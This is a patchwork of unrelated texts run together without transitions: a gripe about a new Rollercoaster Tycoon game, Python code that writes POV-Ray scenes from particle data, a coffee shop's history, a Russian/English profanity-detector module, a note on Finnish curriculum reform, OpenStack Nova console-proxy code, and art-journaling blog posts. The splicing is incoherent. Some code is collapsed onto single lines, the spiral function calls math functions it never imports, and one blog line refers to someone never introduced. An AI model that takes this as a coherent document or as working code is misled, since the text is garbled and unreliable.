Hey, a new Rollercoaster Tycoon game got shown off properly for the first time today! Remember Rollercoaster Tycoon, and how good it was 10, 15 years ago? Keep remembering, because this one looks like hell. I mean that in the most literal sense. For all I know this could be the most enjoyable Rollercoaster Tycoon game ever made once you sit down and play around with it. For now, though, *whistles*. This is a PC game. I think Davy speaks for all of us. Though with the game out in just a few months, I wouldn't hold your breath. This blowback follows on from last year's Rollercoaster Tycoon game, which was also not a fan favourite.
## {{{ http://code.activestate.com/recipes/205451/ (r1) import sys, os import numpy as np import networkx as nx #from pygraph.classes.graph import graph #from pygraph.algorithms.accessibility import connected_components class File: def __init__(self,fnam="out.pov",*items): self.file = open(fnam,"w") self.__indent = 0 self.write(*items) def include(self,name): self.writeln( '#include "%s"'%name ) self.writeln() def indent(self): self.__indent += 1 def dedent(self): self.__indent -= 1 assert self.__indent >= 0 def block_begin(self): self.writeln( "{" ) self.indent() def block_end(self): self.dedent() self.writeln( "}" ) if self.__indent == 0: # blank line if this is a top level end self.writeln( ) def write(self,*items): for item in items: if type(item) == str: self.include(item) else: item.write(self) def writeln(self,s=""): #print " "*self.__indent+s self.file.write(" "*self.__indent+s+os.linesep) class Vector: def __init__(self,*args): if len(args) == 1: self.v = args[0] else: self.v = args def __str__(self): return "<%s>"%(", ".join([str(x)for x in self.v])) def __repr__(self): return "Vector(%s)"%self.v def __mul__(self,other): return Vector( [r*other for r in self.v] ) def __rmul__(self,other): return Vector( [r*other for r in self.v] ) class Item: def __init__(self,name,args=[],opts=[],**kwargs): self.name = name args=list(args) for i in range(len(args)): if type(args[i]) == tuple or type(args[i]) == list: args[i] = Vector(args[i]) self.args = args self.opts = opts self.kwargs=kwargs def append(self, item): self.opts.append( item ) def write(self, file): file.writeln( self.name ) file.block_begin() if self.args: file.writeln( ", ".join([str(arg) for arg in self.args]) ) for opt in self.opts: if hasattr(opt,"write"): opt.write(file) else: file.writeln( str(opt) ) for key,val in list(self.kwargs.items()): if type(val)==tuple or type(val)==list: val = Vector(*val) file.writeln( "%s %s"%(key,val) ) else: file.writeln( "%s %s"%(key,val) ) file.block_end() def 
__setattr__(self,name,val):
        self.__dict__[name]=val
        if name not in ["kwargs","args","opts","name"]:
            self.__dict__["kwargs"][name]=val

    def __setitem__(self,i,val):
        if i < len(self.args):
            self.args[i] = val
        else:
            # indexes past the args fall through into the opts list
            i -= len(self.args)
            if i < len(self.opts):
                self.opts[i] = val

    def __getitem__(self,i):
        if i < len(self.args):
            return self.args[i]
        else:
            i -= len(self.args)
            if i < len(self.opts):
                return self.opts[i]

class Texture(Item):
    def __init__(self,*opts,**kwargs):
        Item.__init__(self,"texture",(),opts,**kwargs)

class Pigment(Item):
    def __init__(self,*opts,**kwargs):
        Item.__init__(self,"pigment",(),opts,**kwargs)

class Finish(Item):
    def __init__(self,*opts,**kwargs):
        Item.__init__(self,"finish",(),opts,**kwargs)

class Normal(Item):
    def __init__(self,*opts,**kwargs):
        Item.__init__(self,"normal",(),opts,**kwargs)

class Camera(Item):
    def __init__(self,*opts,**kwargs):
        Item.__init__(self,"camera",(),opts,**kwargs)

class LightSource(Item):
    def __init__(self,v,*opts,**kwargs):
        Item.__init__(self,"light_source",(Vector(v),),opts,**kwargs)

class Background(Item):
    def __init__(self,*opts,**kwargs):
        Item.__init__(self,"background",(),opts,**kwargs)

class Box(Item):
    def __init__(self,v1,v2,*opts,**kwargs):
        #self.v1 = Vector(v1)
        #self.v2 = Vector(v2)
        Item.__init__(self,"box",(v1,v2),opts,**kwargs)

class Cylinder(Item):
    def __init__(self,v1,v2,r,*opts,**kwargs):
        " opts: open "
        Item.__init__(self,"cylinder",(v1,v2,r),opts,**kwargs)

class Plane(Item):
    def __init__(self,v,r,*opts,**kwargs):
        Item.__init__(self,"plane",(v,r),opts,**kwargs)

class Torus(Item):
    def __init__(self,r1,r2,*opts,**kwargs):
        Item.__init__(self,"torus",(r1,r2),opts,**kwargs)

class Cone(Item):
    def __init__(self,v1,r1,v2,r2,*opts,**kwargs):
        " opts: open "
        Item.__init__(self,"cone", (v1,r1,v2,r2),opts,**kwargs)

class Sphere(Item):
    def __init__(self,v,r,*opts,**kwargs):
        Item.__init__(self,"sphere",(v,r),opts,**kwargs)

class Union(Item):
    def __init__(self,*opts,**kwargs):
        Item.__init__(self,"union",(),opts,**kwargs)

class 
Intersection(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"intersection",(),opts,**kwargs) class Difference(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"difference",(),opts,**kwargs) class Merge(Item): def __init__(self,*opts,**kwargs): Item.__init__(self,"merge",(),opts,**kwargs) class Mesh2(Item): class VertexVectors(Item): def __init__(self,vertex,*opts,**kwargs): Item.__init__(self, "vertex_vectors", (len(vertex), *map(Vector, vertex)), opts,**kwargs) class FaceIndices(Item): def __init__(self,faces,*opts,**kwargs): Item.__init__(self, "face_indices", (len(faces), *map(Vector, faces)), opts,**kwargs) class VertexNormals(Item): def __init__(self,faces,*opts, **kwargs): Item.__init__(self, "normal_vectors", (len(faces), *map(Vector, faces)), opts,**kwargs) def __init__(self,vertex,faces,*opts, normals=None,**kwargs): if normals is None: Item.__init__(self, "mesh2", (), (self.VertexVectors(vertex), self.FaceIndices(faces), *opts), **kwargs) else: Item.__init__(self, "mesh2", (), (self.VertexVectors(vertex), self.VertexNormals(normals), self.FaceIndices(faces), *opts), **kwargs) x = Vector(1,0,0) y = Vector(0,1,0) z = Vector(0,0,1) white = Texture(Pigment(color=(1,1,1))) def tutorial31(): " from the povray tutorial sec. 
3.1" file=File("demo.pov","colors.inc","stones.inc") cam = Camera(location=(0,2,-3),look_at=(0,1,2)) sphere = Sphere( (0,1,2), 2, Texture(Pigment(color="Yellow"))) light = LightSource( (2,4,-3), color="White") file.write( cam, sphere, light ) def spiral(): " Fibonacci spiral " gamma = (sqrt(5)-1)/2 file = File() Camera(location=(0,0,-128), look_at=(0,0,0)).write(file) LightSource((100,100,-100), color=(1,1,1)).write(file) LightSource((150,150,-100), color=(0,0,0.3)).write(file) LightSource((-150,150,-100), color=(0,0.3,0)).write(file) LightSource((150,-150,-100), color=(0.3,0,0)).write(file) theta = 0.0 for i in range(200): r = i * 0.5 color = 1,1,1 v = [ r*sin(theta), r*cos(theta), 0 ] Sphere( v, 0.7*sqrt(i), Texture( Finish( ambient = 0.0, diffuse = 0.0, reflection = 0.85, specular = 1 ), Pigment(color=color)) ).write(file) theta += gamma * 2 * pi ## end of http://code.activestate.com/recipes/205451/ }}} def exportPOV( path = '/mnt/htw20/Documents/data/retrack/go/1/', head = 'J1_thr0_radMin3.1_radMax0_6min', tail = '_t000', out = '/home/mathieu/Documents/Thesis/data/go/1/mrco_ico.pov', ico_thr = -0.027, zmin = 100, zmax = 175, header = 'go1.inc', polydisperse = False ): if polydisperse: positions = np.load(path+head+tail+'.npy') radii = positions[:,-2]*np.sqrt(2) positions = positions[:,:-2] else: positions = np.loadtxt(path+head+tail+'.dat', skiprows=2) Q6 = np.loadtxt(path+head+'_space'+tail+'.cloud', usecols=[1]) bonds = np.loadtxt(path+head+tail+'.bonds', dtype=int) q6, w6 = np.loadtxt(path+head+tail+'.cloud', usecols=[1,5], unpack=True) u6 = ((2*6+1)/(4.0*np.pi))**1.5 * w6 * q6**3 ico_bonds = np.bitwise_and( u6[bonds].min(axis=-1)<ico_thr, np.bitwise_and( positions[:,-1][bonds].min(axis=-1)<zmax, positions[:,-1][bonds].max(axis=-1)>zmin ) ) ico = np.unique(bonds[ico_bonds]) mrco = np.unique(bonds[np.bitwise_and( Q6[bonds].max(axis=-1)>0.25, np.bitwise_and( positions[:,-1][bonds].min(axis=-1)<zmax, positions[:,-1][bonds].max(axis=-1)>zmin ) )]) gr = 
nx.Graph()
    gr.add_nodes_from(ico)
    for a,b in bonds[ico_bonds]:
        gr.add_edge(a,b)
    try:
        components = list(nx.connected_components(gr))
    except RuntimeError:
        print("Graph is too large for ico_thr=%g, lower the threshold."%ico_thr)
        return
    # networkx yields components as sets of nodes; build the
    # node -> 1-based cluster id mapping the code below expects
    cc = dict()
    for cl, comp in enumerate(components, 1):
        for p in comp:
            cc[p] = cl
    #remove clusters that contain less than 10 particles
##    sizes = np.zeros(max(cc.values()), int)
##    for p,cl in cc.iteritems():
##        sizes[cl-1] +=1
##    cc2 = dict()
##    for p,cl in cc.iteritems():
##        if sizes[cl-1]>9:
##            cc2[p] = cl
##    cc =cc2
    if polydisperse:
        pov_mrco = [
            Sphere((x,y,z), r)
            for x,y,z,r in np.column_stack((positions,radii))[np.setdiff1d(mrco, ico)]
            ]
    else:
        pov_mrco = [
            Sphere((x,y,z), 6)
            for x,y,z in positions[np.setdiff1d(mrco, ico)]
            ]
    pov_mrco = Union(*pov_mrco + [Texture(Pigment(color="Green"))])
    if polydisperse:
        pov_ico = [
            Sphere(
                tuple(positions[p].tolist()), radii[p],
                Texture(Pigment(color="COLORSCALE(%f)"%(cl*120.0/max(cc.values()))))
                )
            for p, cl in cc.items()]
    else:
        pov_ico = [
            Sphere(
                tuple(positions[p].tolist()), 6,
                Texture(Pigment(color="COLORSCALE(%f)"%(cl*120.0/max(cc.values()))))
                )
            for p, cl in cc.items()]
    pov_ico = Union(*pov_ico)
    f = File(out, "colors.inc", header)
    f.write(pov_mrco, pov_ico)
    f.file.flush()
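The writer classes above ultimately serialize to POV-Ray's `name { args... }` block syntax, with vectors rendered as `<x, y, z>` literals. A tiny standalone sketch of that serialization (`vec` and `render` are illustrative helpers, not the classes above, and they omit the recipe's indentation and option handling):

```python
# Standalone sketch of what File/Item/Vector emit: POV-Ray objects are
# "name { comma-joined args }" blocks and vectors are "<x, y, z>" literals.
def vec(*coords):
    return "<%s>" % ", ".join(str(c) for c in coords)

def render(name, *args):
    return "%s\n{\n%s\n}\n" % (name, ", ".join(str(a) for a in args))

scene_text = render("sphere", vec(0, 1, 2), 2)
# roughly what Sphere((0,1,2), 2).write(file) prints, minus indentation
```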
The doors at Savaya Coffee Market were officially opened April 7, 2009. The shop, located in the middle of the William’s Center Shopping Plaza, was outfitted with equipment though not aesthetically complete on the day of opening. Nonetheless, teacher and entrepreneur Burc Maruflu greeted first-time customers with a smile. In the following months, Savaya Coffee Market continued to develop its look and personality: the shop came to life with notable murals painted by local artist Jos Villabrille, a long mesquite-wood bar was installed, and a six-panel chalkboard was mounted over the bar. A coffee hobbyist for years, Burc has pursued quality coffee with a passion for the excellent cup. His enthusiasm and love of coffee are exuded through Savaya Coffee Market. Over the past years, Savaya has become a gathering place for people with the common interest of drinking great coffee. What could be better than fantastic coffee in the company of friends?
# -*- coding: utf-8 -*-
# Author: masteroncluster@gmail.com
# Py-Censure is an obscene words detector/replacer for Russian / English languages
# Russian patterns are from PHP-Matotest, http://php-matotest.sourceforge.net/,
# that was written by Scarab
# Ported to Python by Master.Cluster <masteroncluster@gmail.com>, 2010, 2016
# English patterns are adapted from http://www.noswearing.com/dictionary/
from __future__ import unicode_literals, print_function

import re
from copy import deepcopy
from importlib import import_module

from .lang.common import patterns, constants


def _get_token_value(token):
    return token.value


def _get_remained_tokens(tags_list):
    if not tags_list:
        return '', ''  # pre, post
    pre = []
    post = []
    body_pre = []
    body_post = []
    word_started = word_ended = False
    # <a><b>wo</b>rd<i> here</i><img><span>End</span>
    while len(tags_list):
        # pre and body
        tag = tags_list.pop(0)
        if tag.token_type == 'w':
            word_started = True
        if word_started:
            if tag.token_type in 'to tc ts':
                body_pre.append(tag)
        else:
            pre.append(tag)
        # post
        if len(tags_list):
            tag = tags_list.pop(-1)
            if tag.token_type == 'w':
                word_ended = True
            if word_ended:
                if tag.token_type in 'to tc ts':
                    body_post.insert(0, tag)
            else:
                post.insert(0, tag)

    body_tags = body_pre + body_post
    while len(body_tags):
        tag = body_tags.pop(0)
        if tag.token_type == 'sp':  # Do we need that tags?
            continue
        elif tag.token_type == 'tc':
            # can find in pre or in body
            open_tags = [x for x in pre
                         if x.tag == tag.tag and x.token_type == 'to']
            if len(open_tags):
                pre.remove(open_tags[0])
                continue
        else:
            # can be in body
            close_tags = [x for x in body_tags
                          if x.tag == tag.tag and x.token_type == 'tc']
            if len(close_tags):
                body_tags.remove(close_tags[0])
                continue
            # can find in post
            close_tags = [x for x in post
                          if x.tag == tag.tag and x.token_type == 'tc']
            if len(close_tags):
                post.remove(close_tags[0])
                continue
    return ''.join(map(_get_token_value, pre + body_tags)), \
        ''.join(map(_get_token_value, post))


class Token(object):
    def __init__(self, value=None, token_type=None):
        head = value.split(' ', 1)  # splits
        if len(head) == 1:  # simple tag i.e <h1>, </i>
            head = head[0][1:-1].lower()  # need to cut last '>' symbol
        else:  # complex tag with inner params i.e <input type=...>
            head = head[0].lower()[1:]
        if not token_type:
            token_type = 'to'  # open type ie <a...>
            # should derive from value
            if head[0] == '/':
                head = head[1:]
                token_type = 'tc'  # close type ie </a>
            elif value[-2] == '/':
                token_type = 'ts'  # self-closed type ie <img .../>
            if token_type in 'to tc ts' and \
                    re.match(patterns.PAT_HTML_SPACE, value):
                # token_type != w aka word
                token_type = 'sp'  # this is SPACER!!!
        self.value = value
        self.tag = head
        self.token_type = token_type  # w - word(part of), t - tag, s - spacer, o - o

    def __repr__(self):
        return 'Token({}) {} {}'.format(
            self.value, self.tag, self.token_type)  # .encode('utf-8')


class CensorException(Exception):
    pass


class CensorBase:
    lang = 'ru'

    def __init__(self, do_compile=True):
        self.lang_lib = import_module('censure.lang.{}'.format(self.lang))

        if do_compile:
            # patterns will be pre-compiled, so we need to copy them
            def prep_var(v):
                return deepcopy(v)
        else:
            def prep_var(v):
                return v

        # language-related constants data loading and preparations
        self.bad_phrases = prep_var(self.lang_lib.constants.BAD_PHRASES)
        self.bad_semi_phrases = prep_var(self.lang_lib.constants.BAD_SEMI_PHRASES)
        self.excludes_data = prep_var(self.lang_lib.constants.EXCLUDES_DATA)
        self.excludes_core = prep_var(self.lang_lib.constants.EXCLUDES_CORE)
        self.foul_data = prep_var(self.lang_lib.constants.FOUL_DATA)
        self.foul_core = prep_var(self.lang_lib.constants.FOUL_CORE)

        self.do_compile = do_compile
        if do_compile:
            self._compile()  # will compile patterns

    def _compile(self):
        """
        For testing functionality and finding the regexp rule under which
        a word falls, disable the call to this function by passing
        do_compile=False to __init__, then debug, fix the bad rule,
        and use do_compile=True again
        """
        for attr in ('excludes_data', 'excludes_core', 'foul_data',
                     'foul_core', 'bad_semi_phrases', 'bad_phrases'):
            obj = getattr(self, attr)
            if isinstance(obj, dict):
                for (k, v) in obj.items():
                    # safe cause of from __future__ import unicode_literals
                    if isinstance(v, "".__class__):
                        obj[k] = re.compile(v)
                    else:
                        obj[k] = tuple(
                            (re.compile(v[i]) for i in range(0, len(v))))
                setattr(self, attr, obj)
            else:
                new_obj = []
                for i in range(0, len(obj)):
                    new_obj.append(re.compile(obj[i]))
                setattr(self, attr, new_obj)

    def check_line(self, line):
        line_info = {'is_good': True}
        words = self._split_line(line)
        # Checking each word in phrase line, if found any foul word,
        # we think that all phrase line is bad
        if words:
            for word in words:
                word_info = self.check_word(word)
                if not word_info['is_good']:
                    line_info.update({
                        'is_good': False,
                        'bad_word_info': word_info
                    })
                    break
        if line_info['is_good']:
            phrases_info = self.check_line_bad_phrases(line)
            if not phrases_info['is_good']:
                line_info.update(phrases_info)
        return line_info

    def check_line_bad_phrases(self, line):
        line_info = self._get_word_info(line)
        self._check_regexps(self.bad_phrases, line_info)
        line_info.pop('word')  # not the word but the line
        return line_info

    def _split_line(self, line):
        raise CensorException('Not implemented in CensorBase')

    def _prepare_word(self, word):
        if not self._is_pi_or_e_word(word):
            word = re.sub(patterns.PAT_PUNCT3, '', word)
        word = word.lower()
        for pat, rep in self.lang_lib.patterns.PATTERNS_REPLACEMENTS:
            word = re.sub(pat, rep, word)
        # replace similar symbols from another charsets with russian chars
        word = word.translate(self.lang_lib.constants.TRANS_TAB)
        # deduplicate chars
        word = self._remove_duplicates(word)
        return word

    @staticmethod
    def _get_word_info(word):
        return {
            'is_good': True,
            'word': word,
            'accuse': [],
            'excuse': []
        }

    def check_word(self, word, html=False):
        word = self._prepare_word(word)
        word_info = self._get_word_info(word)

        # Accusing word
        fl = word[:1]  # first_letter
        if fl in self.foul_data:
            self._check_regexps(self.foul_data[fl], word_info)
        if word_info['is_good']:  # still good, more accuse checks
            self._check_regexps(self.foul_core, word_info)
        if word_info['is_good']:  # still good, more accuse checks
            self._check_regexps(self.bad_semi_phrases, word_info)

        # Excusing word
        if not word_info['is_good']:
            self._check_regexps(
                self.excludes_core, word_info, accuse=False)  # excusing
        if not word_info['is_good'] and fl in self.excludes_data:
            self._check_regexps(
                self.excludes_data[fl], word_info, accuse=False)  # excusing
        return word_info

    @staticmethod
    def _is_pi_or_e_word(word):
        if '2.72' in word or '3.14' in word:
            return True
        return False

    def clean_line(self, line, beep=constants.BEEP):
        bad_words_count = 0
        words = re.split(patterns.PAT_SPACE, line)
        for word in words:
            word_info = self.check_word(word)
            if not word_info['is_good']:
                bad_words_count += 1
                line = line.replace(word, beep, 1)

        bad_phrases_count = 0
        line_info = self.check_line_bad_phrases(line)
        if not line_info['is_good']:
            for pat in line_info['accuse']:
                line2 = re.sub(pat, beep, line)
                if line2 != line:
                    bad_phrases_count += 1
                    line = line2
        return line, bad_words_count, bad_phrases_count

    def clean_html_line(self, line, beep=constants.BEEP_HTML):
        bad_words_count = start = 0
        tokens = []
        for tag in re.finditer(patterns.PAT_HTML_TAG, line):  # iter over tags
            text = line[start:tag.start()]
            # find spaces in text
            spacers = re.finditer(patterns.PAT_SPACE, text)
            spacer_start = 0
            for spacer_tag in spacers:
                word = text[spacer_start:spacer_tag.start()]
                if word:
                    tokens.append(Token(token_type='w', value=word))
                tokens.append(Token(token_type='sp', value=spacer_tag.group()))
                spacer_start = spacer_tag.end()
            word = text[spacer_start:]
            if word:
                tokens.append(Token(token_type='w', value=word))
            start = tag.end()
            tokens.append(Token(value=tag.group()))
        word = line[start:]  # LAST prep
        if word:
            tokens.append(Token(token_type='w', value=word))

        current_word = current_tagged_word = ''
        result = ''
        tagged_word_list = []

        def process_spacer(cw, ctw, twl, r, bwc, tok=None):
            if cw and not self.is_word_good(cw, html=True):
                # Here we must find pre and post badword tags to add in result,
                # ie <h1><b>BAD</b> -> <h1> must remain
                pre, post = _get_remained_tokens(twl)
                # bad word
                r += pre + beep + post
                bwc += 1
            else:  # good word
                r += ctw
            twl = []
            cw = ctw = ''
            if tok:
                r += tok.value
            return cw, ctw, twl, r, bwc

        for token in tokens:
            if token.token_type in 'to tc ts':
                tagged_word_list.append(token)
                current_tagged_word += token.value
            elif token.token_type == 'w':
                tagged_word_list.append(token)
                current_tagged_word += token.value
                current_word += token.value
            else:  # spacer here
                current_word, current_tagged_word, tagged_word_list, \
                    result, bad_words_count = process_spacer(
                        current_word, current_tagged_word, tagged_word_list,
                        result, bad_words_count, tok=token)
        if current_word:
            current_word, current_tagged_word, tagged_word_list, \
                result, bad_words_count = process_spacer(
                    current_word, current_tagged_word, tagged_word_list,
                    result, bad_words_count, tok=None)
        return result, bad_words_count

    def is_word_good(self, word, html=True):
        word_info = self.check_word(word, html=html)
        return word_info['is_good']

    def _get_rule(self, rule):
        if not self.do_compile:
            return rule
        else:
            return '{} {}'.format(
                rule,
                'If you want to see string-value of regexp, '
                'init with do_compile=False for debug'
            )

    @staticmethod
    def _remove_duplicates(word):
        buf = prev_char = ''
        count = 1  # can be <3
        for char in word:
            if char == prev_char:
                count += 1
                if count < 3:
                    buf += char
                # else skip this char, so AAA -> AA, BBBB -> BB,
                # but OO -> OO, and so on
            else:
                count = 1
                buf += char
            prev_char = char
        return buf

    def _check_regexps(self, regexps, word_info,
                       accuse=True, break_on_first=True):
        keys = None  # assuming list regexps here
        if isinstance(regexps, dict):
            keys = regexps.keys()
            regexps = regexps.values()
        for i, regexp in enumerate(regexps):
            if re.search(regexp, word_info['word']):
                rule = regexp
                if keys:  # dict rule set
                    rule = list(keys)[i]
                rule = self._get_rule(rule)
                if accuse:
                    word_info['is_good'] = False
                    word_info['accuse'].append(rule)
                else:
                    word_info['is_good'] = True
                    word_info['excuse'].append(rule)
                if break_on_first:
                    break


class CensorRu(CensorBase):
    lang = 'ru'

    def _split_line(self, line):
        buf, result = '', []
        line = re.sub(patterns.PAT_PUNCT2, ' ',
                      re.sub(patterns.PAT_PUNCT1, '', line))
        for word in re.split(patterns.PAT_SPACE, line):
            if len(word) < 3 and \
                    not re.match(self.lang_lib.patterns.PAT_PREP, word):
                buf += word
            else:
                if buf:
                    result.append(buf)
                    buf = ''
                result.append(word)
        if buf:
            result.append(buf)
        return result


class CensorEn(CensorBase):
    lang = 'en'

    def _split_line(self, line):
        # have some differences from russian split_line
        buf, result = '', []
        line = re.sub(patterns.PAT_PUNCT2, ' ',
                      re.sub(patterns.PAT_PUNCT1, '', line))
        for word in re.split(patterns.PAT_SPACE, line):
            if len(word) < 3:
                buf += word
            else:
                if buf:
                    result.append(buf)
                    buf = ''
                result.append(word)
        if buf:
            result.append(buf)
        return result


class Censor:
    supported_langs = {
        'ru': CensorRu,
        'en': CensorEn,
    }

    @staticmethod
    def get(lang='ru', do_compile=True, **kwargs):
        if lang not in Censor.supported_langs:
            raise CensorException(
                'Language {} is not yet in supported: {}. Please contribute '
                'to project to make it available'.format(
                    lang, sorted(Censor.supported_langs.keys())))
        return Censor.supported_langs[lang](do_compile=do_compile, **kwargs)
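One self-contained piece of the cleaning pipeline above is easy to illustrate in isolation: the character de-duplication step. The sketch below mirrors the logic of `CensorBase._remove_duplicates` (collapse any run of three or more identical characters down to two, so elongated spellings still match the patterns) as a standalone function:

```python
def remove_duplicates(word):
    """Collapse runs of 3+ identical chars to 2 (AAA -> AA, BBBB -> BB),
    while leaving legitimate doubles (OO) untouched.

    Mirrors CensorBase._remove_duplicates above.
    """
    buf = prev_char = ''
    count = 1
    for char in word:
        if char == prev_char:
            count += 1
            if count < 3:
                buf += char  # keep at most two in a row
        else:
            count = 1
            buf += char
        prev_char = char
    return buf

print(remove_duplicates('cooool'))    # cool
print(remove_duplicates('balloon'))   # balloon (doubles survive)
```

This is why the detector normalizes "baaaaad" toward "baad" before the regexp rules run: elongations collapse to a bounded form the patterns can anticipate.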
The Huffington Post’s World Post reports that Finland has adopted new standards for its National Core Curriculum similar to those of the Common Core in the United States. Under the new regulations, Finnish educators will no longer teach subjects like math, science, or history to students; instead, learning will be topical, meaning that lessons will be interdisciplinary and practical in nature. For example, a class on the European Union would combine elements of language, economics, history, and geography. As Finnish students consistently rank at the top of the Program for International Student Assessment (PISA) tests, the new measure has attracted a lot of attention across the world. In the US, the same interdisciplinary and real-world criteria have been a part of the Common Core movement to enhance critical thinking and problem solving skills. The World Post article points out that the reforms align well with Howard Gardner’s multiple intelligences (MI) theory. By catering to different modes of instruction and incorporating various ways of approaching the same issues in the classroom, the standards implicitly acknowledge MI’s relevance to the educational experience.
# Copyright (c) 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

"""Console Proxy Service."""

from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_utils import importutils

from nova.compute import rpcapi as compute_rpcapi
import nova.conf
from nova import exception
from nova.i18n import _LI
from nova import manager
from nova import utils

CONF = nova.conf.CONF

LOG = logging.getLogger(__name__)


class ConsoleProxyManager(manager.Manager):
    """Sets up and tears down any console proxy connections.

    Needed for accessing instance consoles securely.
    """

    target = messaging.Target(version='2.0')

    def __init__(self, console_driver=None, *args, **kwargs):
        if not console_driver:
            console_driver = CONF.console_driver
        self.driver = importutils.import_object(console_driver)
        super(ConsoleProxyManager, self).__init__(service_name='console',
                                                  *args, **kwargs)
        self.driver.host = self.host
        self.compute_rpcapi = compute_rpcapi.ComputeAPI()

    def reset(self):
        LOG.info(_LI('Reloading compute RPC API'))
        compute_rpcapi.LAST_VERSION = None
        self.compute_rpcapi = compute_rpcapi.ComputeAPI()

    def init_host(self):
        self.driver.init_host()

    def add_console(self, context, instance_id):
        instance = self.db.instance_get(context, instance_id)
        host = instance['host']
        name = instance['name']
        pool = self._get_pool_for_instance_host(context, host)
        try:
            console = self.db.console_get_by_pool_instance(
                context, pool['id'], instance['uuid'])
        except exception.NotFound:
            LOG.debug('Adding console', instance=instance)
            password = utils.generate_password(8)
            port = self.driver.get_port(context)
            console_data = {'instance_name': name,
                            'instance_uuid': instance['uuid'],
                            'password': password,
                            'pool_id': pool['id']}
            if port:
                console_data['port'] = port
            console = self.db.console_create(context, console_data)
            self.driver.setup_console(context, console)
        return console['id']

    def remove_console(self, context, console_id):
        try:
            console = self.db.console_get(context, console_id)
        except exception.NotFound:
            LOG.debug('Tried to remove non-existent console '
                      '%(console_id)s.',
                      {'console_id': console_id})
            return
        self.db.console_delete(context, console_id)
        self.driver.teardown_console(context, console)

    def _get_pool_for_instance_host(self, context, instance_host):
        context = context.elevated()
        console_type = self.driver.console_type
        try:
            pool = self.db.console_pool_get_by_host_type(
                context, instance_host, self.host, console_type)
        except exception.NotFound:
            # NOTE(mdragon): Right now, the only place this info exists is the
            #                compute worker's flagfile, at least for
            #                xenserver. Thus we need to ask.
            pool_info = self.compute_rpcapi.get_console_pool_info(
                context, console_type, instance_host)
            pool_info['password'] = self.driver.fix_pool_password(
                pool_info['password'])
            pool_info['host'] = self.host
            pool_info['public_hostname'] = CONF.console_public_hostname
            pool_info['console_type'] = self.driver.console_type
            pool_info['compute_host'] = instance_host
            pool = self.db.console_pool_create(context, pool_info)
        return pool
All that’s left to complete for my submission to The Sketchbook Project 2012 is to wrap up my journal into a safe package and send it off. Yes, I’ve finished the pages, scanned them, and over the next few days I will have the last handful of images color-corrected and posted to flickr. Yay! It is also a bit surprising–and kind of funny–that although I fully embraced the “monochromatic” theme, now that I am back to my personal journal, I am also back to color. I really love my water-soluble graphite pencils that I used throughout my journal for The Sketchbook Project, and I have even created some personal journal pages with them. But I haven’t touched them for a few days now. Instead, I’ve been using many of the paints and inks (and crayons and pencils) that I put aside for the brief time I was working on my monochromatic pages. So, I guess it’s a “color correction” in its own way. Going back and forth between extremes–that achieves balance, right? Recently, I’ve seen a few artists online who have made Teesha Moore’s 16-page journal. That motivated me to post the instructions for Pam Carriker’s 12-page journal, although I haven’t posted a “how-to” here before. I like Pam’s journal because it’s a bit simpler, involves no measuring, uses the single sheet efficiently, and can easily be adapted to any size sheet. And it really does take only about ten minutes to make! I have made this type of journal twice, both times using 14×17 sheets of Strathmore drawing paper. (One is the Everyday Journal I posted on flickr: http://flic.kr/s/aHsjw2quTm.) I like to work small, but I think I will try making one from a 22×30 sheet next time. Some notes on the instructions: 1) Maybe you want to reverse steps 4 and 5 so that you don’t accidentally tear open the folds that are to be the spine. 2) For heavier paper, wet the edges you will tear open; it makes it easier. 3) Want 24 pages? Just do the same steps with two sheets at once instead of one.
I am almost finished with my submission for The 2012 Sketchbook Project! Hooray–just one more page to go! But whether I am intimidated or not, I generally follow rules; so I signed up and selected a theme from the list that was given without too much fuss. In many places on the website there were encouragements to use the themes as guides and suggestions, not limitations. I still felt a little uneasy. I had decided on “monochromatic,” since I felt that was safe–I could use it to influence my method or media, if not my subjects. After all, giving my sketchbook a theme–Hopes and Failures, The Worst Story Ever Told, or a similar one from the list of suggestions–would be to bare more than I am ready for. I take comfort in the fact that no one really knows what my doodles, collages, paintings, and journal pages are all about. Their response to anything I put out there remains just that–theirs. Yes, it’s more than a little ironic to sing into a microphone and hope that no one understands you, just like it doesn’t make any sense to post art online on this big, vast internet and then refuse to tell anyone what it’s really about. But we all cope in our own way. “Not Ideas About the Thing, But the Thing Itself” is a Wallace Stevens poem that has fascinated me since I was first introduced to it in college. At the time, it was the most obscure poem I had ever read, and I just couldn’t figure it out. It was a “welcome to college where you’ll find out that you’re not as smart as you think you are” moment. It was a moment of authenticity. And authenticity is what I think of when I read that poem today; after all, we seem to live in a culture that is hungry for experiences that are direct, immediate, and most importantly, authentic. This has a good side: protesters across the world can take videos with cell phones and instantly upload them to the internet to show us what their totalitarian leaders are really up to.
On the other hand, it means that “The Jersey Shore” and other reality shows like it are the most popular shows on television. I have no numbers to prove this, but instinct tells me that today more people read blogs than newspapers. There’s more–think of how few people write first novels anymore. They write memoirs instead. And think of how professional wrestling has lost the interest of many, while the UFC is growing. The first time I saw a UFC fight on TV, I told my husband (a blue belt in jiu-jitsu), “But it just looks like two guys in a street fight!” Exactly. Whereas professional wrestling is a performance, this stuff looks real. Our culture today rejects anything that seems too manufactured, too polished, too precious. We want the real thing. But what does this have to do with journals and art? I wonder that myself. It was a little less than 15 years ago when I first saw examples of art journals at a presentation given by Tracy and Teesha Moore. The idea that you’d make art that is just for you–just like you’d write a diary that you never intended anyone else to read–and then show it, was so new that it was a shock to me. But now art journals and sketchbooks are hardly new; in fact, they seem to be all over. There’s the 1000 Journals Project. The Sketchbook Project. There are books and books of examples and how-to’s; there are websites, too. It used to be that artists’ sketchbooks were private places where they worked out the challenges of larger, finished pieces that were intended for a wider audience. The finished piece was “the real thing.” Today the opposite seems to be true–those raw, unfinished pages seem more real. More genuine. And so even if the popularity of “The Jersey Shore” makes me worry, more sketchbooks–and more art–in the world doesn’t. Last night, I tried to draw my hair. About a week ago, there was a Yahoo!
